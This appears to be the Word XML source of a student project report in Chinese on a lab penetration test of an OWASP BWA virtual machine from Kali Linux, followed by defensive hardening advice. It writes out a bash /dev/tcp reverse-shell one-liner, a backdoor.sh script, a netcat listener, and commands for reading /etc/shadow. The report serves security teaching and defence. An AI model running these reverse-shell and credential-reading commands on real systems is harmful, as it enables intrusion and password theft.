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資訊工程學系</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000002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104學年度專題製作期初報告</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000003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題目：從滲透到防禦(基於 Kali Linux 的反向 Shell 攻擊與後門植入實戰演練)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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指導老師：       教授</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000C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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">組長:高恩在</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">組員:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">中華民國 114年6月26日</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017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目錄</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018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一、 摘要 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019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二、 研究背景與目的 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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三、 專題內容 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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四、 研究方法 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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五、 流程圖 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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六、 預計完成之工作項目及具體成果 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E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七、 工作分配與預定進度甘梯圖 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F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八、 遭遇問題與解決方案 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020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九、 儀器設備需求表 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="141823"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:color w:val="141823"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">十、 參考資料</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">十一、 實驗圖片</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023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一、摘要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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本專題旨在模擬駭客攻擊流程，運用 Kali Linux 工具集對 OWASP Broken Web Applications（BWA）進行滲透測試，成功獲取遠端系統 root 權限並取得機敏檔案（如 /etc/shadow）。測試過程涵蓋端口掃描、服務分析、漏洞利用、反向 shell 建立、資訊蒐集與網頁服務分析，完整還原實務中攻擊者的操作路徑。本專題不僅提供系統性攻擊流程，也強調防禦觀點與系統安全意識之重要性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F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二、研究背景與目的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隨著 Web 應用系統日益複雜，潛藏於其中的安全漏洞亦層出不窮。OWASP BWA 提供一個合法、安全的靶場環境，用以學習與測試常見的 Web 弱點及其攻擊手法。本研究以 Kali Linux 為主要攻擊平臺，目的包括：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熟悉滲透測試工具與流程。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執行反向 Shell 建立並取得 root 權限。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驗證靶機系統資訊洩露（如 /etc/passwd、/etc/shadow）。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建立從掃描到攻擊的完整攻擊鏈。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累積合法環境下之紅隊實作經驗。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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三、專題內容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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本研究內容涵蓋以下重點：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建置 Kali Linux 與 OWASP BWA 虛擬環境（透過 VirtualBox）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確認雙機 IP：攻擊端 Kali（192.168.56.111），目標端 OWASP（192.168.56.105）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使用 Netcat 建立 Listener，實現反向 Shell 回連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提權至 root 權限後，讀取 /etc/shadow、/etc/passwd、Web 根目錄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執行後門腳本並檢視開放端口與 arp table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資訊蒐集與網頁資源分析</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E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四、研究方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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本研究採用以下滲透流程：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環境建置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：以 VirtualBox 建立 Kali Linux 與 OWASP BWA 主機。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端口與服務掃描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：透過 nmap、netstat 與 arp -a 探測主機服務與連線。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反向 Shell 注入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：於 Kali 上使用 nc -lvnp 4444 等待回連，目標端執行 .sh 後門腳本或 bash -i。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權限提升與資料存取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：取得 root 權限，讀取敏感檔案與登入紀錄。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網站分析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：列出 /var/www/ 目錄中網頁專案如 bwapp、webgoat、evil 等進行資安評估。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055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五、流程圖</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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</w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4870800" cy="5040000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21257857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DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
          <w:b w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">六、預計完成之工作項目及具體成果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:widowControl w:val="1"/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工作項目表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table1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69"/>
        <w:gridCol w:w="5127"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3169"/>
            <w:gridCol w:w="5127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工作項目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預期成果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虛擬機環境建置與網段配置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完整連通之 Kali &amp; OWASP 靶機環境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反向 Shell 測試與後門腳本實作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成功連線並控制靶機，建立遠端命令介面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系統與網頁資源分析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收集敏感系統資訊、存取網站目錄、分析網頁弱點結構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完整實驗截圖與流程紀錄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系統命令與流程圖完整呈現，支援最終成果展示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069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實驗圖片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前置作業(示意)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F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</w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2834640"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212578576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從攻擊機（Kali）將 payload（如惡意 ELF 檔案）傳送到目標機（OWASP），測試檔案傳送是否成功、是否能在內部網段滲透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實驗圖片(使用反彈shell)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000072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</w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="21257857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</w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212578576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</w:rPr>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="3920400" cy="2106000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="212578576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400" cy="210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實驗報告：OWASP BWA 系統弱點測試</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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一、實驗目標與環境</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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目的：</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">透過已知漏洞入侵目標主機 OWASP BWA，建立反彈 shell 並提權，蒐集敏感資訊以驗證系統弱點存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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環境設定：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攻擊者主機（Kali Linux）：192.168.56.111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目標主機（OWASP BWA）：192.168.56.105</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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二、反向 Shell 建立過程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Kali 啟動 Netcat 監聽：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E">
      <w:pPr>
        <w:ind w:firstLine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nc -lvnp 4444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OWASP 傳送反向 shell：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080">
      <w:pPr>
        <w:ind w:firstLine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bash -i &gt;&amp; /dev/tcp/192.168.56.111/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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結果： Kali 成功接收反向連線並取得 root 權限。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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三、目標系統偵察與權限驗證</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table2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72"/>
        <w:gridCol w:w="2153"/>
        <w:gridCol w:w="4271"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1872"/>
            <w:gridCol w:w="2153"/>
            <w:gridCol w:w="4271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指令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說明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執行結果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uname -a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查看核心與系統資訊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Linux owaspbwa 2.6.32-25-generic-pae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whoami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檢查當前使用者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root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查詢 UID 與群組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uid=0(root) gid=0(root)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ls /home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檢查家目錄使用者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發現使用者 user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cat /etc/passwd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取得系統帳號列表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可讀取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cat /etc/shadow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密碼雜湊資料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成功讀取，可用於破解分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098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四、網站目錄與弱點分析</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3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14"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="3686"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3214"/>
            <w:gridCol w:w="1396"/>
            <w:gridCol w:w="3686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指令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說明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結果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ls -l /var/www/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列出網站根目錄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包含 bwapp、webgoat、wivet 等漏洞平台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ls /var/www/html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檢查常用目錄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不存在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cat /var/www/html/index.php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嘗試讀取首頁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無資料可讀（目錄不存在）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五、網路服務與可橫向移動資源偵測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查看開啟的網路服務：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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netstat -tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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偵測結果：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80：Apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AC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443：HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD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22：SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE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3306：MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF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5432：PostgreSQL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其他服務：Java、Samba、nmbd 等</w:t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查詢本地網段資訊（ARP）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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arp -a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="144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偵測到：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="216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192.168.56.111（Kali）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="216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192.168.56.1（預設閘道）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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六、已完成成果與潛在攻擊向量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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已成功事項：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成功建立反向 shell 並以 root 權限登入。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取得 /etc/shadow 密碼雜湊，可進行離線暴力破解。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掌握完整系統版本、使用者、家目錄與服務狀況。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探測開放的服務與網路連線資訊。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可執行及修改檔案，如部署 backdoor.sh。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD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補充：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE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1.後門腳本 (backdoor.sh)：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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bash -i &gt;&amp; /dev/tcp/192.168.56.111/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1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2.提權方式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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不需額外提權 —— 目標機預設為 root 使用者執行 Web Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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從畫面中我們觀察到以下幾點：</w:t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在目標機 OWASP BWA 中執行 wget、chmod +x、./backdoor.sh 的使用者為：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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root@owaspbwa:~#</w:t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執行 ./backdoor.sh 成功後連線回 Kali：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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connect to [192.168.56.111] from (UNKNOWN) [192.168.56.105] 47340</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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root@owaspbwa:~#</w:t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表示「反向 shell 一開始就是 root 權限」。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA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3.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="PMingLiu" w:cs="PMingLiu" w:eastAsia="PMingLiu" w:hAnsi="PMingLiu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本次實驗防禦面觀點總整理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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主題：從滲透到防禦｜反向 Shell → 後門 → 提權 → 偵測與阻擋</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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一、阻斷 Backdoor 傳輸與執行</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4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85"/>
        <w:gridCol w:w="5811"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2485"/>
            <w:gridCol w:w="5811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防禦措施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說明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Egress Filtering（封鎖對外連線）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限制目標主機向外連線，只允許特定 port（如 80/443），封鎖如 4444 的高危埠口：</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sudo iptables -A OUTPUT -p tcp --dport 4444 -j REJECT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封鎖 Bash TCP 反彈技巧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透過 AppArmor / SELinux 禁止 /dev/tcp 連線。甚至可重新編譯 bash 移除其支援。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移除反向 Shell 工具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刪除 wget, curl, nc 等工具減少被利用機會。或用 sandbox 限制（如 Firejail）。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noexec 掛載目錄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防止 /tmp, /uploads 被用來執行下載後門：</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">tmpfs /tmp tmpfs defaults,noexec,nosuid 0 0（寫入 /etc/fstab）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8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二、帳號與密碼控管加強</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5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57"/>
        <w:gridCol w:w="6139"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2157"/>
            <w:gridCol w:w="6139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D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防禦措施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說明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強化 /etc/shadow 權限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確保其為 chmod 640 並屬於 root:shadow，避免 hash 外洩。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禁用 root SSH 登入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修改 /etc/ssh/sshd_config：</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">PermitRootLogin no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安全 sudo 設定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僅允許指定指令，不可執行 shell 或任意程式；搭配密碼策略與 2FA 實施。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2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三、啟用日誌與入侵偵測（IDS/IPS）</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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73"/>
        <w:gridCol w:w="6323"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1973"/>
            <w:gridCol w:w="632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E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防禦措施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說明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auditd 系統稽核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追蹤關鍵系統呼叫、檔案變更：</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">auditctl -a always,exit -F arch=b64 -S execve -k suspicious-exec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fail2ban 阻擋異常登入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設定 5 次 SSH 錯密自動封鎖 IP 10 分鐘，修改 /etc/fail2ban/jail.local：</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">maxretry=5, bantime=600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集中日誌與主動告警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整合 rsyslog + logwatch 或 Wazuh, OSSEC，進行集中分析與即時通報。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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四、檢查後門與異常活動</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="829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96"/>
        <w:gridCol w:w="6000"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2296"/>
            <w:gridCol w:w="600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E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防禦措施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說明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掃描後門啟動點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常見位置：~/.bashrc, cron, rc.local, systemd 自動啟動等。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監控可疑程序與連線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定期執行：ps aux, netstat -tulnp, lsof -i 檢查異常連線與執行程序。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tripwire 比對檔案完整性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比對被入侵前後 /etc/passwd, /bin/bash 是否被竄改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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實際防禦驗證設計</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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防禦驗證 1：fail2ban 阻擋 SSH 爆破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安裝並設定最大 5 次錯密後封鎖 IP：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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apt install fail2ban</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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nano /etc/fail2ban/jail.local</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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# 加入以下內容</w:t>
      </w:r>
    </w:p>
